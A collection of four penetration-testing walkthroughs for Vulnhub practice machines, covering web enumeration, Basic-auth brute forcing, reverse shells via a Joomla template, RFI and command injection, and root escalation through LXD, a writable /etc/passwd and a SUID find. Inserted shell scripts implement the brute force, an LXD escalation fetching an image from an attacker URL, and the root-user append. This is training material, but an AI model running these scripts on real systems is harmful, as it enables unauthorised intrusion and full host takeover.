HA Joker Vulnhub Walkthrough

Today we are going to solve our Boot to Root challenge called “HA: Joker”. We built this lab for online penetration-testing practice. Solving it is not that tough if you have a proper basic knowledge of penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find Root Flag on the Target Machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Brute force
    • Brute-forcing the HTTP Basic-auth panel on port 8080
  • Exploitation
    • Exploiting the Joomla
    • Getting a reverse connection
    • Spawning a TTY Shell
  • Privilege Escalation
    • LXD

Walkthrough

Scanning Network

First of all, we identify our target on the local network with the netdiscover command. The target came out to be 192.168.1.101.

Now that we have identified our target, we continue to the second step and scan it with nmap.

Enumeration

The scan shows that ports 22, 80 and 8080 are open: SSH on 22 and HTTP on both 80 and 8080. Since port 80 is open, we opened the target IP address in our browser, as shown in the following image:

This gave us a collection of Joker quotes from his appearances in the comics and the movies over the years. We also inspected the page source; it was riddled with more Joker quotes in HTML comments, but nothing actionable.

As the site on port 80 gave us nothing useful, we moved on to the service on port 8080. Surprisingly, this one is protected by HTTP Basic authentication, so it is only accessible with valid credentials, as shown in the image below. It’s time to look for those credentials.

While we were browsing, we also ran a directory brute force against port 80 with dirb, in several variants with different file extensions appended. The run with the .txt extension paid off: it found secret.txt.

secret.txt contained a conversation between Batman and our beloved Joker. The word ‘rock’ is repeated in it, which made us think of ‘rockyou.txt’, the famous password dictionary. There was also a mention of ‘one of your 100 poor jokes’, a bizarrely specific number. Putting the two together, we concluded that the password for the panel on port 8080 must be among the first 100 entries of the rockyou dictionary.

Having decided to use the top 100 rockyou.txt passwords, we first compiled a smaller dictionary of just those 100 entries, which keeps the brute force fast and light. The head command with its -n parameter set to 100 prints the first 100 lines of the dictionary, and the greater-than (>) redirection writes them to a new text file.

Because this is a web application, we brute force the login with Burp Suite. With the browser proxied through Burp, we open the page on port 8080, enter any random characters in the Basic-auth login prompt and press OK.

With Intercept enabled in Burp, clicking OK captures the request the browser generated. We right-clicked the captured request and chose “Send to Intruder”.

In the Intruder tab we open the Positions sub-tab, set the Attack type to Sniper, select the base64 value that follows “Basic” in the Authorization header and click the Add button on the right.

That header value is base64(username:password), so a plain password list is not enough: each payload must be the base64 encoding of a full username:password pair. We therefore took the 100-entry dictionary we just created, prefixed every line with the username ‘joker’ and a colon (‘joker:’), and base64-encoded each line, giving a file of values in exactly the form the Authorization header uses. (Alternatively, load the plain ‘joker:password’ lines and add a Base64-encode rule under Payload Processing so that Intruder encodes them on the fly.) In the Payloads tab we loaded that file as the payload set.

Back in the Positions tab we clicked “Start attack”. Most responses come back as 401 Unauthorized; the one we want is the entry that returns 200 OK.

Base64 is an encoding, not encryption, so the successful payload can be decoded straight back to plain text. It came out to be:

We went back to the login prompt and entered the username ‘joker’ with the password ‘hannah’. The login succeeded and we were presented with a Joomla website, as shown in the image.
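The whole payload-preparation step above, as an added example that is not part of the original post: the script builds the base64 joker:password tokens that Intruder needs from the first 100 lines of a wordlist, decodes a captured token back to user:password, and, for anyone who prefers the command line to Burp, tries the same candidates with curl. The five-entry wordlist, the TARGET_URL address and the file names are constructed for the demo and are not from the post.

```sh
#!/bin/sh
# Added example, not code from the original post: build the Burp Intruder payload
# list for an HTTP Basic-auth brute force and decode the winning payload afterwards.
# Assumptions: the wordlist below is a constructed stand-in for rockyou.txt, the
# username "joker" and the 100-entry cut-off come from the post, and TARGET_URL is a
# placeholder for the port-8080 panel.
set -eu

TARGET_URL="${TARGET_URL:-http://192.168.1.101:8080/}"   # assumed address of the protected panel

# The Authorization header carries "Basic " + base64(user:password); the base64
# part is the value Burp marks as the payload position.
basic_auth_token() {
    printf '%s:%s' "$1" "$2" | base64 | tr -d '\n'
}

# Reverse of the above: turn a captured header value back into user:password.
basic_auth_decode() {
    printf '%s' "$1" | base64 -d
}

# head -n <count> <wordlist>, as in the post, then one base64 "user:password"
# token per line, ready to load as an Intruder payload set.
make_payload_list() {
    wordlist=$1 user=$2 count=$3
    head -n "$count" "$wordlist" | while IFS= read -r pw; do
        basic_auth_token "$user" "$pw"
        printf '\n'
    done
}

# CLI alternative to Intruder: curl -u sends the same Authorization header, and we
# keep the first candidate that is not answered with 401. Not run here (needs the target).
curl_brute() {
    wordlist=$1 user=$2 count=$3
    head -n "$count" "$wordlist" | while IFS= read -r pw; do
        code=$(curl -s -o /dev/null -w '%{http_code}' -u "$user:$pw" "$TARGET_URL")
        if [ "$code" = "200" ]; then
            printf 'found: %s:%s\n' "$user" "$pw"
            break
        fi
    done
}

# Constructed stand-in for /usr/share/wordlists/rockyou.txt: one password per line.
SAMPLE_WORDLIST=$(mktemp)
printf '%s\n' 123456 password hannah 12345678 qwerty > "$SAMPLE_WORDLIST"

# Number of payloads produced from the sample list (head stops at end of file).
payload_count() {
    make_payload_list "$SAMPLE_WORDLIST" joker 100 | wc -l | tr -d ' '
}
```

Against the real dictionary the call is make_payload_list /usr/share/wordlists/rockyou.txt joker 100 > payloads.txt; the token for joker:hannah is am9rZXI6aGFubmFo, which is also the string to look for in the Intruder results column.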

Since this is Joomla, its admin login panel should be at /administrator, so we browsed there and were stopped by another login form. Joomla has no built-in default credentials (the installer makes you choose them), but the weak combination ‘joomla:joomla’ is a common guess, so it was the first thing we tried.

Now logged into Joomla as the Super User, we exploit the server by planting a PHP reverse shell; Kali ships one at /usr/share/webshells/php/php-reverse-shell.php. Go to the Templates section: click Extensions in the menu, open the beez3 template and choose Customise. This opens an editor as shown in the image. Select index.php and replace its contents with the reverse shell, remembering to change the IP address and port in the script to those of our listener.

Save the file with the Save button. index.php now contains our reverse shell, and all that is left is to execute it, which happens whenever a page is rendered through the beez3 template (for instance by reloading the front page if beez3 is the active template). Before triggering it we need something to catch the connection, so we start a netcat listener on the port we put in the script, as shown in the image below.

The shell we received was a bare, non-interactive one, so we upgraded it to a proper TTY with the usual Python one-liner. Running id showed that we are www-data and, more interestingly, that www-data is a member of the lxd group. That is our way to root.

Privilege Escalation

To learn the Lxd privilege escalation in detail, refer to this article: “Lxd Privilege Escalation”.

To escalate to root we need an LXD image we control. First, on the attacker machine (Kali Linux), clone the lxd-alpine-builder repository with git, change into the lxd-alpine-builder directory and run the build-alpine script; it builds the latest Alpine image as a compressed tar archive.

Next we transfer the tar file to the target, serving it from the attacker machine with Python’s built-in HTTP server.

On the target, we download the Alpine image, import it into LXD, and initialise a new container from it. The container must be created as a privileged one; otherwise root inside the container is not root on the host and the next step gains nothing.

Finally, we attach the host’s root filesystem (/) to the container as a disk device mounted at /mnt/root, start the container and execute a shell inside it. The prompt changes: we are now root inside the container, and /mnt/root exposes the host’s entire filesystem with root’s privileges. Enumerating there we found the final.txt flag. This concludes this Boot to Root challenge.
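The LXD steps above collected into one script, as an added example that is not part of the original post. It assumes the Alpine tarball from lxd-alpine-builder is served at IMAGE_URL (a placeholder address for the attacker’s Python HTTP server), that it runs from www-data’s lxd-group shell on the target, and it names the container privesc; DRY_RUN=1 prints the commands instead of executing them so the sequence can be reviewed first.

```sh
#!/bin/sh
# Added example, not code from the original post: the lxd-group escalation as one
# script, meant to be run from the www-data shell on the target. Assumptions:
# IMAGE_URL is a placeholder for the attacker's Python HTTP server hosting the
# Alpine tarball built with lxd-alpine-builder; the container name is arbitrary.
set -eu

IMAGE_URL="${IMAGE_URL:-http://192.168.1.100:8000/alpine.tar.gz}"   # assumed attacker URL
IMAGE_FILE="${IMAGE_FILE:-/tmp/alpine.tar.gz}"
CONTAINER="${CONTAINER:-privesc}"
DRY_RUN="${DRY_RUN:-0}"   # DRY_RUN=1 prints each command instead of running it

run() {
    if [ "$DRY_RUN" = "1" ]; then printf '%s\n' "$*"; else "$@"; fi
}

# Precondition: only members of the lxd group can talk to the LXD socket
# (this is what "id" revealed for www-data in the post).
in_lxd_group() {
    id -nG 2>/dev/null | tr ' ' '\n' | grep -qx lxd
}

lxd_privesc() {
    if [ "$DRY_RUN" != "1" ] && ! in_lxd_group; then
        echo "current user is not in the lxd group; this path will not work" >&2
        return 1
    fi
    run wget -q -O "$IMAGE_FILE" "$IMAGE_URL"                        # fetch the image from the attacker
    run lxc image import "$IMAGE_FILE" --alias alpine                 # register it with LXD
    run lxc init alpine "$CONTAINER" -c security.privileged=true      # privileged: uid 0 inside == uid 0 on the host
    run lxc config device add "$CONTAINER" hostroot disk source=/ path=/mnt/root recursive=true
    run lxc start "$CONTAINER"
    run lxc exec "$CONTAINER" -- /bin/sh                              # inside: the host filesystem is under /mnt/root
}

# Run the escalation only when invoked as "sh lxd_privesc.sh go", so that sourcing
# the file for its functions has no side effects.
if [ "${1:-}" = "go" ]; then
    lxd_privesc
fi
```

Run it as sh lxd_privesc.sh go on the target. The security.privileged=true setting is what makes uid 0 in the container equal uid 0 on the host; without it, host files owned by root show up as nobody inside the container and the trick fails.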

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

HA: ISRO Vulnhub Walkthrough

Today we are going to solve our CTF challenge called “HA: ISRO”. We built this lab for online penetration-testing practice. Solving it is not that tough if you have a proper basic knowledge of penetration testing. Let’s start and learn how to breach it.

Download Here

Level: Intermediate

Task: Find 4 Flags on the victim’s machine.

Penetration Methodologies

  • Scanning Network
    • Netdiscover
    • Nmap
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
  • Exploitation
    • RFI
    • Create PHP reverse shell
    • Getting a reverse connection via RFI
    • Spawning a TTY Shell
  • Privilege Escalation
    • Writable /etc/passwd File

Walkthrough

Scanning Network

First of all, we identify our target on the local network with netdiscover.

Having identified the target, we continue to the second step and scan it with nmap.

Enumeration

The scan shows that ports 22 and 80 are open, running SSH and HTTP respectively. Since port 80 is open, we opened the target IP address in our browser, as shown in the following image:

This opened the web page shown above. It links to a Bhaskara page, which we opened and found to be an information page, as shown in the image below:

As a matter of convention we enumerate a page by reading its source. Here we find a “Bhaskara Launch Code”, which looks like base64-encoded text.

We decode it by piping the string from echo into base64 -d.

The decoded text is “/bhaskara”, a hint that there is a directory of that name.

So we browsed to the /bhaskara path; instead of a page, the browser downloaded a file of about 2 MB. After examining it we concluded that it is a TrueCrypt volume. (A TrueCrypt container carries no file signature and looks like random data, so this identification rests on context rather than on a magic-number check.)

To get at the volume we used the true.py script (linked from the original post) to extract the volume’s hash and crack it; the password came out to be ‘xavier’.

A TrueCrypt volume exists to hide something, so we opened it with VeraCrypt (which can still mount TrueCrypt volumes) by providing its path and selecting a free slot, as shown in the image.

Mounting it prompts for the password; we enter the one we found earlier, ‘xavier’.

The volume contains a text file labelled ‘flag.txt’, which gives us our first flag, the Bhaskara flag.

Bhaskara Flag: {b7bb88578a70970b9be45ac8630b6f9d}

Continuing with enumeration, we also ran a directory brute force, which found an /img directory. A second run with the .php extension appended found connect.php.

We went into the /img directory. Here we found an image called aryabhata.jpg.

We downloaded aryabhata.jpg and opened it.

It turned out to be a poster for the Aryabhata satellite, as shown in the image below.

Since nothing about the image itself stood out, we suspected steganography and ran steghide against it in extract mode to pull out anything hidden inside. It contained a text file named flag.txt, which holds the Aryabhata flag.

Aryabhata Flag:{e39cf1cbb00f09141259768b6d4c63fb}

Exploitation

Back in the browser, we turn to connect.php, which the dirb brute force also turned up. Requesting it directly returned nothing, which suggested that it acts on a parameter we were not supplying, so we suspected command injection or file inclusion. Passing /etc/passwd through it returned the file’s contents, as shown in the image below: this is a file inclusion vulnerability, and since it also fetches remote URLs we can use it for remote file inclusion (RFI).

We copied a PHP reverse shell to shell.php, edited it to point at the attacker machine’s IP address and port, and saved it. To deliver it to the target we started Python’s HTTP server in the directory holding shell.php, using the one-liner shown below.

We will catch the reverse connection with netcat, so we start a listener on the port set in the shell file.

With the listener running on the attacker machine, we make the target include the shell through the file inclusion vulnerability by giving connect.php the URL of shell.php on our HTTP server.

The PHP code runs and we get a session on the target. As the image shows, it is not a proper shell, so we upgraded it with the Python one-liner.

We ran netstat to see which addresses and ports the target is listening on, and found a service on port 3306 bound to localhost only. The most common service on port 3306 is MySQL, so we enumerated in that direction.

We logged into MySQL as the root user and listed the databases. One of them is named ‘flag’; looking at its tables we found our third flag, the Mangalyaan flag.

Mangalyaan Flag:{d8a7f803e36f1c84e277009bf2c0f435}

Privilege Escalation

As part of our privilege-escalation enumeration we checked whether /etc/passwd is writable by our user. It is, and that is our way forward: anyone who can write /etc/passwd can add an account with UID 0.

We first need a password hash for the user we are going to add through a new /etc/passwd entry. We generated a salted hash on the attacker machine with openssl passwd.

Back in the shell on the target, we use echo to append an entry for a new user raj to /etc/passwd, with the hash from the previous step and UID and GID 0 so that the account is root. We verified the entry with tail, then ran su raj, entered the password, and had a root shell. In /root we found the final flag, the Chandrayaan flag.

Chandrayaan Flag:{0ad8d59efe7ce5c820aa7350a5d708b2}
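The escalation above as a script, added here as an example and not taken from the original post. It assumes the username raj from the post, a demo salt and password of its own, and takes an optional third argument so the entry can be appended to a copy of /etc/passwd for a dry run before touching the real file.

```sh
#!/bin/sh
# Added example, not code from the original post: the writable-/etc/passwd
# escalation as a script. Assumptions: the new user is "raj" as in the post; the
# salt and password are demo values; the file to modify defaults to /etc/passwd
# but can be pointed at a copy for a dry run.
set -eu

# If we can write /etc/passwd we can add an account with UID 0; su consults the
# hash in the second field directly whenever it is not the "x" shadow marker.
passwd_writable() {
    [ -w "${1:-/etc/passwd}" ]
}

# openssl passwd -1 -salt <salt> <password> prints "$1$<salt>$<hash>", the MD5-crypt
# format that crypt(3) still accepts on the target.
gen_hash() {
    openssl passwd -1 -salt "$2" "$1"
}

# user:hash:uid:gid:comment:home:shell; uid 0 / gid 0 is what makes "su raj" root.
build_entry() {
    printf '%s:%s:0:0:root:/root:/bin/bash\n' "$1" "$2"
}

# Append the entry (the post's echo ... >> /etc/passwd) and show the tail to verify.
add_root_user() {
    user=$1 password=$2 file=${3:-/etc/passwd}
    passwd_writable "$file" || { echo "$file is not writable by $(id -un)" >&2; return 1; }
    build_entry "$user" "$(gen_hash "$password" "xyz123")" >> "$file"
    tail -n 1 "$file"
}
# After add_root_user raj <password>: "su raj" (which needs the TTY from the pty upgrade), then id.
```

On the target the call is add_root_user raj somepassword; the hash only needs to be computed there if openssl is installed, otherwise generate it on the attacker machine with the same gen_hash and paste the resulting line.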

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here

Hacker Fest: 2019 Vulnhub Walkthrough

Hacker Fest:2019 VM is made by Martin Haller. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of easy level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Easy

These labs are available on the Vulnhub website; we downloaded the lab file from this link.

Penetration Testing Methodology

  • Network Scanning
    • Nmap port scan
  • Enumeration
    • Browsing HTTP Service
    • Scanning WordPress (wpscan)
  • Exploiting
    • WordPress Google Maps Plugin SQL Injection
    • WordPress_admin_shell_upload exploit
  • Privilege Escalation
    • Abusing Sudo Rights

Walkthrough

Network Scanning

To identify the target IP address we started with netdiscover, which found 192.168.0.20. Next we ran a more thorough nmap scan using its aggressive mode (-A).

The scan shows port 80 open with Apache httpd, and ports 21 and 22 open as well, so FTP and SSH are also running on the target.

Enumeration

Since port 80 is open, we opened the IP address in the web browser.

The site looks like WordPress, so it’s time to run wpscan against the target.

Further down in the wpscan output we find the WP Google Maps plugin at an outdated version. That could be our way in, so let’s try to exploit it.

WordPress Google maps Sqli Exploit

We searched Metasploit for “google maps” and found a module for this plugin. It exploits a SQL injection in a REST endpoint registered by the wp-google-maps plugin, versions 7.11.00 through 7.11.17 inclusive. Because administrators can change the database table prefix, set the module’s DB_PREFIX option accordingly if the default does not match.

Through that SQL injection we extracted the following password hashes from the target.

Whenever we get hashes, we reach for our best friend John the Ripper. We saved them in a file named ‘hash’ and ran john against it; after some time it cracked one of the hashes, giving the password ‘kittykat1’.

With a working administrator credential, the Metasploit wp_admin_shell_upload module logs into the admin panel and uploads a payload packaged as a WordPress plugin. Because this is authenticated code execution by design, it works on every WordPress version, and it returns a Meterpreter session on the web server.

Great!! It works wonderfully: we now have a reverse connection to the web server as a Meterpreter session.

Privilege Escalation

From the Meterpreter session we drop into a shell on the compromised host and move on to the privilege escalation phase. The first thing to check is what the current user is allowed to run through sudo (sudo -l), since abusing sudo rights is the escalation route on this machine.

Author: Japneet Kaur Gandhi is a Technical Writer, Researcher and Penetration Tester. Contact here

bossplayersCTF 1: Vulnhub Walkthrough

bossplayersCTF 1 VM is made by Cuong Nguyen. This VM is a purposely built vulnerable lab with the intent of gaining experience in the world of penetration testing. It is of intermediate level and is very handy in order to brush up your skills as a penetration tester. The ultimate goal of this challenge is to get root and to read the root flag.

Level: Intermediate

These labs are available on the Vulnhub website; we downloaded the lab file from this link.

Penetration Testing Methodology

  • Network Scanning
    • netdiscover
    • nmap port scan
  • Enumeration
    • Browsing HTTP Service
    • Performing Directory Bruteforce
    • Decoding Encoded Text
  • Exploiting
    • Command Injection
  • Privilege Escalation
    • SUID on find command
  • Capture the flag

Walkthrough

Network Scanning

The first step of any attack is to identify the target. We did that with netdiscover.

Next we ran an aggressive nmap scan (-A) to learn the open ports and the services behind them.

The scan shows port 80 open with a Rocket httpd banner and port 22 open with OpenSSH.

Enumeration

Next we enumerate the host, starting with the HTTP service in a browser. The page carries the machine’s description: this is an extremely easy CTF meant for people getting started with CTFs, and there may be rabbit holes, which we will try to avoid.

As usual we checked the page source for hints and found an encoded value in a comment. This might lead somewhere.

Before following it we ran a directory brute force with dirb, which found robots.txt. It contains another encoded string, labelled as a super-secret password; decoding it gives only the troll message “lol try harder bro”. This is presumably the rabbit hole the description mentioned.

Back to the encoded comment from the page source. It looked like base64, so we decoded it with the base64 command and got another base64 string; decoding that gave yet another, and decoding a third time finally produced workinginprogress.php. That looks important, so the repeated decoding was not wasted.
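An added example, not from the original post, for the repeated decoding above (and for the ISRO launch code earlier, which is the one-layer case): a small decoder that keeps peeling base64 layers until the result stops being valid, printable base64, and reports how many layers it removed. The three-layer and one-layer inputs it builds with encode_n are constructed here to stand in for the strings on the page.

```sh
#!/bin/sh
# Added example, not code from the original post: decode a base64 blob that has
# been encoded several times over, stopping as soon as the result is no longer
# valid, printable base64. The encoded inputs below are constructed here.
set -eu

# True when the string contains only printable ASCII, i.e. a layer worth decoding further.
is_printable() {
    ! printf '%s' "$1" | LC_ALL=C grep -q '[^[:print:]]'
}

# Peel base64 layers until decoding fails or yields something non-printable.
# Prints the innermost plaintext and the number of layers removed, tab-separated.
decode_nested() {
    cur=$1 depth=0
    while next=$(printf '%s' "$cur" | base64 -d 2>/dev/null) && [ -n "$next" ] && is_printable "$next"; do
        cur=$next
        depth=$((depth + 1))
    done
    printf '%s\t%s\n' "$cur" "$depth"
}

# Helper to build inputs: encode a string N times, as the CTF author did.
# tr strips the line wrapping that base64 inserts after 76 characters.
encode_n() {
    s=$1 n=$2
    while [ "$n" -gt 0 ]; do
        s=$(printf '%s' "$s" | base64 | tr -d '\n')
        n=$((n - 1))
    done
    printf '%s\n' "$s"
}

# Constructed stand-ins for the two hints on the page (three layers and one layer).
PAGE_SOURCE_HINT=$(encode_n 'workinginprogress.php' 3)
ROBOTS_HINT=$(encode_n 'lol try harder bro' 1)
```

The stop rule is a heuristic: a plaintext that happens to be a well-formed base64 string would be decoded one step too far, so compare the printed layer count with what you expect before trusting the result.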

Opening that file in the browser, as shown in the image, gives a checklist of sorts: Debian Linux installed, Apache2 installed, PHP installed. The two items not yet done are “test the ping command” and “fix privilege escalation”. Both read like major hints.

Exploiting

A ping test that is still being worked on smells like command injection. To check, we passed the id command through the URL, as shown in the image below, and it executed: this is indeed command injection.

To exploit it we use a netcat reverse-shell one-liner. First we start a netcat listener on the attacker machine to receive the shell.

With the listener running, we replaced the id command in the URL with the reverse-shell command, which runs /bin/bash connected back to the attacker machine at 192.168.1.105 (Kali Linux) on the listener’s port.

Back in the terminal running the listener, we have a session, but its shell is a bare one, so we ran the Python one-liner to upgrade it to a proper TTY. The session belongs to www-data, an unprivileged user, so we need a way to an elevated shell, and we start by enumerating the target through the shell we have.

As part of that enumeration we ran find with the -perm option to list files with the SUID bit set. The find binary itself turned out to be SUID, which makes the job easy.

Privilege Escalation

Because a SUID find runs whatever -exec invokes with its owner’s effective UID, we used it to launch /bin/sh, as shown in the image below, and got back a root shell. We confirmed it by running id.
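The enumeration and the find abuse above as one script, added here as an example rather than taken from the original post. find_suid takes the directories to search as arguments, suid_find_shell takes the shell to spawn (defaulting to /bin/sh), and demo_suid_dir creates a SUID-marked file in a temporary directory so the enumeration can be exercised on a machine without a SUID find.

```sh
#!/bin/sh
# Added example, not code from the original post: SUID enumeration the way the post
# does it (find -perm) plus the abuse of a SUID find. Assumptions: the search roots
# and the shell to spawn are parameters; the SUID-marked file created by
# demo_suid_dir is constructed for this demo only.
set -eu

# List regular files with the SUID bit under the given roots; "permission denied"
# noise from unreadable directories is discarded.
find_suid() {
    find "$@" -perm -4000 -type f 2>/dev/null
}

is_suid() {
    [ -u "$1" ]
}

# find runs its -exec command with find's own effective uid, so a SUID-root find
# hands us a root shell. -quit stops after the first match so only one shell spawns.
# Pass the shell as arguments; bash (and recent dash) need "-p" to keep the effective uid.
suid_find_shell() {
    fbin=$(command -v find)
    is_suid "$fbin" || { echo "$fbin is not SUID; nothing to abuse" >&2; return 1; }
    [ $# -gt 0 ] || set -- /bin/sh
    find . -exec "$@" \; -quit
}

# Constructed demo target: a SUID-marked empty file in a temp dir.
demo_suid_dir() {
    d=$(mktemp -d)
    : > "$d/setuid_demo"
    chmod u+s "$d/setuid_demo"
    printf '%s\n' "$d"
}
```

On the target the calls are find_suid / to spot the SUID find, then suid_find_shell (or suid_find_shell /bin/bash -p if the spawned shell would drop the effective uid); id in the new shell shows euid=0.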

We then went looking for the root flag in root’s home directory and found root.txt. Its content is base64-encoded; decoded, it says “congratulations”. This concludes the CTF challenge.

NOTE: We typed the commands normally; the shell has no TTY, so it simply echoed each typed line back along with its output, which is why the screenshot looks the way it does.

Author: Pavandeep Singh is a Technical Writer, Researcher and Penetration Tester Contact here